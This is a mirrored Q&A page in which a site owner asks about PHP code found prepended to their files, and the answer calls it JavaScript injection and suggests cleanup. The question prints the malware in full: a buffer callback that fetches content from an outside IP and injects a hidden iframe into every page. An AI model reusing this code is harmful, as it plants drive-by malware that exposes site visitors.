stackoom
  简体   繁体   中英

Server Hack - Random Code added tot he top of PHP files

 原文  2013-10-22 15:05:43       php

Question

i found theses lines of code on some .PHP pages of mine. 

<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>

anyone know anything about it?

Or at least tell me what it is doing...

1 answers

solution1
 6 ACCPTED  2013-10-22 15:07:52

Update 09 / 11 / 2015

This is called JavaScript injection ( XSS 1 ), it happens when your server is hacked and an infection is spread.

This could for instance, promt a download window upon entering the website causing misleaded users to download possibly malicious software on their machine.

To get rid of it you'd best check all the files you have, scan your entire PC / maybe do a clean install. There are usually strange <script> tags in the files with some really freaky " makes-no-sense " JS in it - this is a good indication that your files have been injected with JS.

You'll also need to find the leak if you want to get rid of it permanently (or until they find new ways to XSS your site)

Here's another thing you can do to protect yourself against XSS: CSP

1 :: Cross Site Scripting

Offtopic:

Since I'm revisiting this answer today, 14 years after 9/11 in 2001 I'd like to pay my respects to those who died on that day - RIP

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question PHP Hack - What is this code doing? Strange code added in all php files Random spacing is being added in PHP files when editing PHP hack files found - help decoding and identifying Eval PHP Hack Cannot decode code What's the purpose of this PHP code/hack.? How to fix Random php code is prepended on each php file in the server Is code written in Hack faster than code written in PHP on HHVM? PHP tot MySQL image uploading not working Will the php code run if I added a location.href script condition on the top of the code?
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM